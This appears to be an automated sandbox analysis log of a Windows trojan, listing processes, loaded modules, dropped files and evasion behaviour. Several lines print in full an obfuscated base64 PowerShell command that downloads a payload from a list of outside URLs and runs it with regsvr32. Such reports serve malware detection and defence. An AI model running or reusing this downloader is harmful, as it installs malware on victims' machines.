                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180004E3C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180020E40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180021444
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180012044
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180016054
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001705C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015A64
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015264
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000A26C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180001870
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001F878
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180007678
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001667C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180012680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180014484
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180001E88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000968C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180022290
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180026A90
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015494
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000BC98
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000529C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180008C9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180020AA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800078A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001F0A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180022AAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001E4AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800048B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001ACB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180007EB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800090B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800162BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800270C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800024C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800280C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001AEC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800050D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800234D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001F6DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800026DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180002ADC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002ACE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800150F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001E2F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180016AF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000DEF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001DEFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180012500
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180024104
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006308
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001370C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001A10C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180028D10
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180020118
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180004B18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001A524
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015F24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000F328
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180002D28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000E130
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180029134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180008134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180021738
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002AF38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180022140
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180028348
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000DB4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180014F50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000B350
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006954
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000F554
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002975C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002B564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180012168
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180013568
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180024370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180008370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015774
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180012378
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180019178
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180025180
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180001980
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180021588
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001A988
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180018190
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180013994
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180026B98
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180028998
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001CF9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000359C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001EBA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800061A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800135A6
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180016DA8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800059AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000D7AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800053B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800135B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001C1B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015BB8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800025B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800207BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800085BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800015C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000FFC0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800295C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800229CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000E5D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002A5D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800173DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180018BDC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800261E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFC65CFB3B0 appears 148 times
                  Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFC65CFBD70 appears 113 times
                  Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFC65CF7FF0 appears 31 times
                  Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220523Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skdzzo1y.zp2.ps1Jump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.win@26/11@2/4
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5216:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_01
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: unknownProcess created: cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000C892 push ebp; retf
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000D095 push B3B8007Eh; iretd
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000D0F3 push ebp; iretd
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180013551 push ebx; retf
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000D15D push ebx; retn 0068h
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000CDA8 push ebp; iretd
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000CE36 push 458B0086h; iretd
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180013551 push ebx; retf
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFC65D00CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                  Source: IKdzfJtQpj.BCP.2.drStatic PE information: real checksum: 0x654f5 should be: 0x60ea5
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)Jump to dropped file
                  Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)Jump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll:Zone.Identifier read attributes | delete
                  Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
